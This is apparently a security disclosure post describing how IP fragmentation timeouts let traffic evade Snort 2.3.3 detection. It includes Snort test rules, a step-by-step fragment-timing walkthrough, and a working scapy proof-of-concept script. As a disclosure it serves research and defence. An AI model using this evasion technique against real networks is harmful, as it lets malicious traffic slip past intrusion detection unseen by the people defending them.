<pre>
Dan Kaminsky gave a presentation at shmoocon and mentioned using
ip fragmentation timers to evade intrusion detection systems. It's
a pretty straightforward technique and easy to code up so we
decided to look and see if Snort was vulnerable.
We added a couple of rules
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"Found Generic ICMP Packet"; icode:0; itype:8; classtype:misc-activity; sid:384; rev:5;)
alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"Found BadStuff"; content:"BADSTUFF";icode:0; itype:8; classtype:misc-activity; sid:384; rev:5;)
to a snort 2.3.3 config file (gentoo emerge).
We crafted up a quick ping with the string "BADSTUFF" to test our configuration.
Sure enough, snort alerted on the packet. Next we tested that snort was
properly assembly fragments. We fragmented the icmp echo request into two
packets and threw them at the target host. Snort properly reassembled them
in either order and the target returned an echo reply send to a Windows XP
host.
Now for the attack. We crafted 3 fragments. The first contained a standard
icmp ping header. The second contained the BADSTUFF string and the third
contained an alternate GODSTUFF string.
Step 1)
Send over the GODSTUFF packet. The GODSTUFF fragment is recieved by Snort
and the Windows XP machine.
Snort WindowsXP
—>GODSTUFF GODSTUFF GODSTUFF
Step 2)
Wait 5 seconds for the fragment to timeout on the XP Host. The frament is
still in the reassembly buffer for Snort.
Snort WindowsXP
(Wait 5sec) GODSTUFF
Step 3)
Send over the common ICMP Header. It is recieved by both Snort and the
WindowsXP host.
Snort WindowsXP
GODSTUFF
—>Header Header Header
Snort now has both pieces it needs for reassembly and reconstructs the framents
into a broken ICMP packet and discards both fragments. The WindowsXP host
now only had the header fragment in the reassembly buffer. (Note: we could have
made the icmp checksum work out, but we didn't have to.)
Snort WindowsXP
—>Header Header
Step 4)
Send over the BADSTUFF packet.
Snort WindowsXP
Header
—>BADSTUFF BADSTUFF BADSTUFF
The WindowsXP host properly reassembles the icmp packet and sends us back
an icmp echo reply with the BADSTUFF string in it. No alerts from snort.
Eventually the BADSTUFF fragment will silently timeout in Snort's buffer.
This technique could be used to bypass most Snort signatures. It'd be fun
to add a snort-inline plugin to do it automatically when pen-testing. If
Snort cleared the fragments in the reassembly buffer on and icmp fragmentation
reassembly time exceeded message, the attack would be hard to pull off.
Unfortunately, many stacks and hardened systems no longer send out those
messages.
Jason Larsen
Mike Milivich
attached is a proof-of-concept in scapy
#!/usr/bin/python
from scapy import *
from time import sleep
from random import seed
from random import randint
seed(None)
ip = IP(dst="10.4.4.4")
ip.id = randint(0x1000,0x5000)
ip.proto = 0x1 # ICMP protocol number
data1 = str(ip/ICMP(id=0x8236, seq=83)/("BADSTUFF"))[len(ip):]
data2 = str(ip/ICMP(id=0x8236, seq=83)/("GODSTUFF"))[len(ip):]
splitLoc = 8
frag1 = data1[:splitLoc]
frag2 = data1[splitLoc:]
frag2Good = data2[splitLoc:]
ip.flags = 0
ip.frag = splitLoc / 8
send(ip/frag2Good)
sleep(5)
ip.flags = 1
ip.frag = 0
send(ip/frag1)
ip.flags = 0
ip.frag = splitLoc / 8
send(ip/frag2)
</pre>